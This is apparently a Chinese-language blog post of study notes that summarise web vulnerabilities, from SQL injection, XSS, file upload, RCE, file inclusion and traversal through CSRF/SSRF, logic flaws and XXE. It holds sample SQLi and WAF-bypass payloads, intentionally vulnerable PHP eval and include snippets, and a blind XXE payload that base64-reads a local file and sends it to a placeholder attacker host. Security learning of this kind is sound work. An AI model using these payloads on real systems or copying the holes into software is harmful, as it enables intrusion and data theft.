<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="web漏洞总结, Vc鹏">
    <meta name="description" content="ONE:sql注入一．sql注入1.sql注入产生原因原理：可控变量带入数据库查询，变量没有过滤或者过滤不严谨。也就是页面信息和数据库产生交互。2.按注入点：数字型  字符型 ‘ “  搜索型 %  %编码型： 数据以编码值传递加密型 数据">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    

    <title>web漏洞总结 | Vc鹏</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.1.0"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Vc鹏</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Vc鹏</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/3.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">web漏洞总结</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-04-06
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="ONE-sql注入"><a href="#ONE-sql注入" class="headerlink" title="ONE:sql注入"></a>ONE:sql注入</h1><p>一．sql注入<br>1.sql注入产生原因原理：可控变量带入数据库查询，变量没有过滤或者过滤不严谨。<br>也就是页面信息和数据库产生交互。<br>2.按注入点：数字型  字符型 ‘ “  搜索型 %  %<br>编码型： 数据以编码值传递<br>加密型 数据以加密的密文发送  格式型 JSON     –+ #<br>二.按数据提交类型<br>GET  POST  Cookie  HTTP 头部:User-Agent、referer<br>三.执行效果<br>1.布尔盲注 时间盲注 报错盲注 堆查询 宽字节<br>2.宽字节：宽字节绕过:%df占用两个字节 乱码 如中文 使\不能出现。<br>（因为系统可能会自动添加)   id&#x3D;1%df’ order by 111<br>3.判断注入点：id&#x3D;1ajsdkjgj  错误，有注入点。<br>4.找注入点  注入点权限   是否是数据库管理员  –isdba<br>5.数据库类型<br>6.信息收集：操作系统，数据库，数据库版本信息收集： 操作系统： @@version_compile_so    version()  database()  user()<br>7.低版本：联合注入： order by x  挨个试  列 (猜解列名数量)    union select 1,2,3,4,x       id&#x3D;-1 看一下报错。哪里报错在哪里开始写查询信息。<br>8.高版本：在mysql5.0以上，存在一个自带数据库名：informaton_schema,存储所有数据库名，表名，列名信息。猜数据库 select schema_name from information_schema.schemata<br>mysql<br>1.低权限：常规注入<br>2.高权限：常规，文件读取：load_file  ,文件写入：into outfile<br>三．Waf绕过<br>安全狗绕过：伪造成百度爬虫，对hearder头进行设置，user-agent&#x3D;”baidu…”就是白名单的形式。<br>Sqlmap对waf绕过<br>编码防注入：–tamper&#x3D;base64encode.py<br>阿里云盾防sql注入  “union”替换”%23a%0aunion”等形式<br>如：–tamper&#x3D;rdog.py –random-agent –tables</p>
<h1 id="TOW-XSS"><a href="#TOW-XSS" class="headerlink" title="TOW:XSS"></a>TOW:XSS</h1><p>文件上传原理：对上传内容，过程没有过滤或过滤不完整<br>sql注入原理：可控变量带入数据库进行查询，变量没有过滤或者过滤不完全。<br>xss 原理：对输入输出没有进行严格的过滤，在页面执行js客户端脚本。   test.php？x&#x3D;&lt;&gt;alert(1)&lt;&#x2F;&gt;  可以控制页面的内容，对输入输出过滤不严格。<br>鸡肋：浏览器内核版本可以决定js脚本的执行。<br>分类：反射，存储，dom  反射和存储是发现不了的源代码的。<br>存储型：是存储在数据库的，留言板。持久攻击。<br>html Dom：查看更多，操作html代码。<br>反射<br>发包 x&#x3D;xiaodi &#x3D;&gt; x.php &#x3D;&gt;回包<br>存储型<br>发包 x&#x3D;xiaodi &#x3D;&gt; x.php &#x3D;&gt; 数据库 &#x3D;&gt;x.php&#x3D;&gt;回包<br>dom<br>发包 x&#x3D;xiaodi &#x3D;&gt;本地浏览器静态前端代码 &#x3D;&gt; x.php &#x3D;&gt;回包  可以代码分析，发现xss的。可以看到源代码。</p>
<p>条件 1.漏洞2.管理员登录3.浏览器没有拦截4.http only<br>cookie:存储本地，存活时间长 小中型<br>session 会话 存储服务器 存活时间短 大型 金融</p>
<h1 id="THREE-文件上传"><a href="#THREE-文件上传" class="headerlink" title="THREE:文件上传"></a>THREE:文件上传</h1><p>一．解析漏洞<br>1.iis 6.0  *.asp;xxx.jpg 此文件会被解析为asp执行</p>
<p>2.Apache 解析文件的规则是从右到左开始判断解析，如果后缀名为不可识别文件解析,就再往左判断。 test2.php.jpg<br>3.Nginx:对于任意文件名，在后面添加&#x2F;xxx.php(xxx为任意字符)，即可将文件作为php解析。<br>二．cms漏洞<br>三．编辑器漏洞<br>四．Cve漏洞<br>五．文件上传思路<br>1.常规类：1.扫描获取上传2.会员中心上传3.后台系统4.各种途径<br>2.Cms:cms源码  通达OA cms<br>3.编辑器类：1.cheditor2.fckeditor3.kindeditor4.xxxeditor<br>4.Cve:代码审计，三方应用</p>
<h1 id="FORE-rce漏洞"><a href="#FORE-rce漏洞" class="headerlink" title="FORE:rce漏洞"></a>FORE:rce漏洞</h1><p>漏洞形成原因：可控变量，函数漏洞。<br>命令执行漏洞和代码执行漏洞：<br>root@ae63a3df5e26:&#x2F;var&#x2F;www&#x2F;html# cat test.php<br><?php
        $code=$_GET['a'];
        eval($code);
?><br>ip&#x2F;test.php?a&#x3D;phpinfo();</p>
<p>防御：敏感函数禁用，变量固定，waf</p>
<p>poc验证漏洞是否存在  exp是漏洞利用代码<br>一句话菜刀原理：远程命令执行相似 把函数功能嵌套到程序里面。</p>
<h1 id="FIVE-目录遍历"><a href="#FIVE-目录遍历" class="headerlink" title="FIVE:目录遍历"></a>FIVE:目录遍历</h1><p>目录遍历漏洞原理比较简单，就是程序在实现上没有充分过滤用户输入的…&#x2F;之类的目录跳转符，导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…&#x2F;，也可是…&#x2F;的ASCII编码或者是unicode编码等。</p>
<p>你可能会觉得目录遍历漏洞和不安全的文件下载，甚至文件包含漏洞有差不多的意思，是的，目录遍历漏洞形成的最主要的原因跟这两者一样，<u>都是在功能设计中将要操作的文件使用变量的 方式传递给了后台</u><br>如果你通过不带参数的url（比如：<a target="_blank" rel="noopener" href="http://xxxx/doc%EF%BC%89%E5%88%97%E5%87%BA%E4%BA%86doc%E6%96%87%E4%BB%B6%E5%A4%B9%E9%87%8C%E9%9D%A2%E6%89%80%E6%9C%89%E7%9A%84%E6%96%87%E4%BB%B6%EF%BC%8C%E8%BF%99%E7%A7%8D%E6%83%85%E5%86%B5%EF%BC%8C%E6%88%91%E4%BB%AC%E6%88%90%E4%B8%BA">http://xxxx/doc）列出了doc文件夹里面所有的文件，这种情况，我们成为</a><u>敏感信息泄露。</u></p>
<h1 id="SIX-文件包含"><a href="#SIX-文件包含" class="headerlink" title="SIX:文件包含"></a>SIX:文件包含</h1><p>通过PHP的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。<br>本地文件包含：绕过：.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;.&#x2F;    …………………………………………………..         windows 大于256<br>远程文件包含：绕过：?   %20    %23<br>无限制的文件包含漏洞：<br>root@f3d91c74e2ee:&#x2F;var&#x2F;www&#x2F;html# cat include.php<br>&lt;?php</p>
<p>$filename&#x3D;$_GET[‘filename’];<br>include ( $filename);</p>
<p>&#x2F;&#x2F;<a target="_blank" rel="noopener" href="http://127.0.0.1:8080/include.php?filename=index.txt">http://127.0.0.1:8080/include.php?filename=index.txt</a><br>&#x2F;*<br>$filename&#x3D;$_GET[‘filename’];<br>include ( $filename .” .html” );<br>*&#x2F;</p>
<p>?&gt;</p>
<p>index.txt:<br><?php
    phpinfo();
?><br>访问ip&#x2F;include.php?filename&#x3D;index.txt</p>
<h1 id="SEVEN-文件下载"><a href="#SEVEN-文件下载" class="headerlink" title="SEVEN:文件下载"></a>SEVEN:文件下载</h1><p>read.xxx?filename&#x3D;<br>down.xxx?filename&#x3D;<br>readfile.xxx?file&#x3D;<br>downfile.xxx?file&#x3D;<br>..&#x2F; ..\ .\ .&#x2F;等<br>&amp;readpath&#x3D;、&amp;filepath&#x3D;、&amp;path&#x3D;、&amp;inputfile&#x3D;、&amp;url&#x3D;、&amp;data&#x3D;、&amp;readfile&#x3D;、&amp;menu&#x3D;、META-INF&#x3D;<br>文件下载中..&#x2F;的使用</p>
<h1 id="EIGHT-DDos"><a href="#EIGHT-DDos" class="headerlink" title="EIGHT:DDos"></a>EIGHT:DDos</h1><p>1.定义：分布式拒绝服务攻击(英文意思是Distributed Denial of Service，简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击，或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的，这类攻击称为分布式拒绝服务攻击。<br>2.它产生的原因就是大量的攻击者洪水般访问目标网站，从而使网站无法对用户服务进行响应。<br>3.产生条件：需要大量的肉鸡，也就是傀儡机。<br>4.DDoS攻击流程<br>1.信息搜集<br>被攻击目标主机数目、地址情况<br>目标主机的配置、性能<br>目标的带宽<br>2.占领傀儡机<br>黑客最感兴趣的是有下列情况的主机：<br>链路状态好的主机<br>性能好的主机<br>安全管理水平差的主机</p>
<h1 id="NINE-csrf-ssrf"><a href="#NINE-csrf-ssrf" class="headerlink" title="NINE:csrf ssrf"></a>NINE:csrf ssrf</h1><p>1..CSRF（Cross-site request forgery），中文名称：跨站请求伪造<br>攻击者借用了你的身份，以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账……造成的问题包括：个人隐私泄露以及财产安全。<br>判断一个网站是否存在CSRF漏洞：就是判断其对关键信息（比如密码等敏感信息）的操作(增删改)是否容易被伪造。<br>利用：1.需要被攻击这登录在网站上2.需要点击链接。<br>防御：–对敏感信息的操作增加安全的token；<br>–对敏感信息的操作增加安全的验证码；<br>–对敏感信息的操作实施安全的逻辑流程，比如修改密码时，需要先校验旧密码等。<br>和xss的区别，xss是获取用户cookie,用用户的身份实施破坏，<u>而csrf是借用用户的权限完成攻击</u>。<br>理论上讲，url跳转属于CSRF的一种，我们需要对传入的URL做有效性的认证，保证该URL来自于正确的地方</p>
<p>2.SSRF(Server-Side Request Forgery:服务器端请求伪造):从其他服务器应用获取数据的功能, 利用有缺陷的web应用作为跳板攻击远程和内网的服务器。<u>a可以访问b，b可以访问c，但是a不可以访问c.</u><br>一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。</p>
<h1 id="TEN-逻辑漏洞："><a href="#TEN-逻辑漏洞：" class="headerlink" title="TEN:逻辑漏洞："></a>TEN:逻辑漏洞：</h1><p>1.登录点暴力破解<br>2.http和https 只有知道加密方式才可以进行爆破<br>3.  cookie脆弱<br>4.支付：数量负数，超过int值。更改订单编号，购买价格，修改商品信息：编号，名字、更改支付接口：微信，支付宝，自己的支付接口，支付状态，优惠券。<br>二.找回密码<br>找回密码：找回重置机制：客户端回显 resp状态码，验证码爆破，找回流程绕过。<br>接口调用乱用：短信轰炸，来电轰炸。<br>修改账号密码：到重置密码页面不提交，抓包修改手机号后进行重置密码操作。已达到登录别人账号的操作<br>客户端：在浏览器里可以看到验证码2.抓包里面显示<br>resp状态码：可以是1,0来判断正确错误  do 模块  前端验证而不是数据库验证<br>爆破验证码<br>接口安全：短信轰炸，来电轰炸。</p>
<p>挖 功能点 参数<br>一.业务逻辑漏洞<br>支付：数量负数，超过int值。更改订单编号，购买价格，修改商品信息：编号，名字、更改支付接口：微信，支付宝，自己的支付接口，支付状态，优惠券。<br>二.用户身份：<br>暴力破解，密码找回:前端验证，短信轰炸，验证码爆破。cookie,session.<br>三验证码绕过：<br>验证码复用，后端没有对验证码进行销毁<br>前端，验证码一次正确，之后验证码不检测了。 发送60秒一次<br>token 替换爆破（需要一些设置） 前提：res包有token回显  密码和token值的爆破<br>四.接口<br>水平越权  wang uid&#x3D;10  设置为1-1000爆破<br>callback 跨站   spi爬虫 批量查询功能点如：id</p>
<h1 id="ELEVEN-中间件"><a href="#ELEVEN-中间件" class="headerlink" title="ELEVEN:中间件"></a>ELEVEN:中间件</h1><p>常见中间件：iis,tomcat,apache,nginx,jboss,weblogic.</p>
<p>IIS是Windows操作系统，而Tomcat是JSP语言环境，其实它也是Apache旗下的一种，不过开发环境不一样。一般Apache主要是Linux操作系统中使用较多。Nginx 是一个高性能的HTTP和反向代理服务，也是一个IMAP&#x2F;POP3&#x2F;SMTP服务。它以稳定性、丰富的功能集、示例配置文件和低系统资源的消耗而闻名。<br>中间件利用<br>1.一般本地开发的话，小项目，或者是个人开发建议使用tomcat。<br>2.linux系统建议使用jetty或apache httpd<br>3.大型的项目就用JBOSS或webloigc</p>
<p>4.大项目或者商业项目一般采用：weblgoic&#x2F;webshere，其他的还有jboss、glasshfish等<br>5.一些示例项目或者小项目常采用jetty</p>
<p>web中间件用于提供系统软件和应用软件之间的连接，以便于软件各部件之间的沟通，其可以为一种或多种应用程序提供容器。<br>中间件是位于操作系统和应用软件之间的通用服务<br>web容器用于给处于其中的应用程序组件（JSP，SERVLET）提供一个环境，是中间件的一个组成部分，它实现了对动态语言的解析。<br>web中间件与web服务器是有重叠的，原因在于tomcat等web中间件也具备web服务器的功能。 </p>
<p>内容管理系统（content management system，CMS），是一种位于WEB前端（Web 服务器）和后端办公系统或流程（内容创作、编辑）之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。如OA</p>
<p>web：一.网站源码：cms   二.搭建平台：中间件安全     三.数据库<br>asp+access     php+mysql    aspx+mssql    jsp+mssql,oracle    python+mongodb</p>
<p>别人浏览你的asp页面是先发送请求到你的服务器 然后你的服务器就把通过IIS解析后的页面 返回给请求者<br>asp           iis+access<br>aspx          iis+mssql<br>Servlet（Server Applet）是Java Servlet的简称，称为小服务程序或服务连接器，用Java编写的服务器端程序，具有独立于平台和协议的特性，主要功能在于交互式地浏览和生成数据，生成动态Web内容。<br>tomcat      支持servlet,jsp</p>
<p>Payload是黑客用来与被黑了的系统交互的简单脚本，指成功exploit之后，真正在目标系统执行的代码或指令。<br>exp:漏洞利用程序或代码。<br>poc:漏洞验证程序<br>为了开发一个动态网站出来，有3中选择<br>1、ASP.NET<br>ASP.NET 的开发框架是 Windows server +IIS+SQL Server+ASP的组合，主要开发语言有C#.NET和VB.NET。<br>2、J2EE开发平台<br>J2EE的开发架构是 UNIX&#x2F;windows+Tomcat+Orecle+JSP的组合，主要是用JAVA编写程序。比如Android平台级应用的网页后台用户管理端<br>3、LAMP开发平台<br>LAMP的开发架构是 Linux+Apache+MySQL+PHP，主要是用PHP来编写程序。比如Facebook</p>
<h1 id="twelve-xxe"><a href="#twelve-xxe" class="headerlink" title="twelve:xxe"></a><strong>twelve:xxe</strong></h1><p>xml:是数据内容，传输和存储数据格式类型。<br>xxe:xml的漏洞注入全称，xml外部实体注入<br>xml :为传输和存储数据，焦点是数据内容  html:用来显示数据，焦点是数据的外观<br>利用：1..有回显得，文件读取2.内网探针或攻击内网应用。3.引入外部实体dtd<br>          2.无回显：读取文件，  增加代码复杂度，base64编码。 类似内网反弹效果，可以在日志文件看到攻击者操作。只需base64编码就可读取看到文件内容。</p>
<p>检测：白盒<br>黑盒：人工，工具<br>人工 ：关键字：1.数据格式类型：<user>teset</user><pass>Mikasa</pass><br>2.content-Type值判断：text&#x2F;xml    application&#x2F;xml<br>3.更改content-Type值为上面类型，检测是否有xxe漏洞。</p>
<p>无回显的代码，其中路径不用完整路径。所以无回显的利用较多。</p>
<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE note [
    <!ENTITY hack "hello world">
<p>]&gt;<br><name>&amp;hack;</name></p>
<p>无回显的代码，其中路径不用完整路径。所以无回显的利用较多。代码有增加其复杂度来达到绕过的那种意思。</p>
<?xml version = "1.0"?>

<!DOCTYPE test [
        <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<pre><code>    &lt;!ENTITY % dtd SYSTEM &quot;http://192.168.xx.xxx:80XX/test.dtd&quot;&gt;
    %dtd;
    %send;
</code></pre>
<p>]&gt;</p>
<p>test.dtd:<br><!ENTITY % payload
    "<!ENTITY &#x25; send SYSTEM
'http://192.168.xx.xxx:80xx/?data=%file;'>“</p>
<blockquote>
<p>%payload;</p>
</blockquote>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Vcpeng</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://www.vcpeng.top/2022/04/06/web-lou-dong-zong-jie/">http://www.vcpeng.top/2022/04/06/web-lou-dong-zong-jie/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">Vcpeng</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">No tag</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

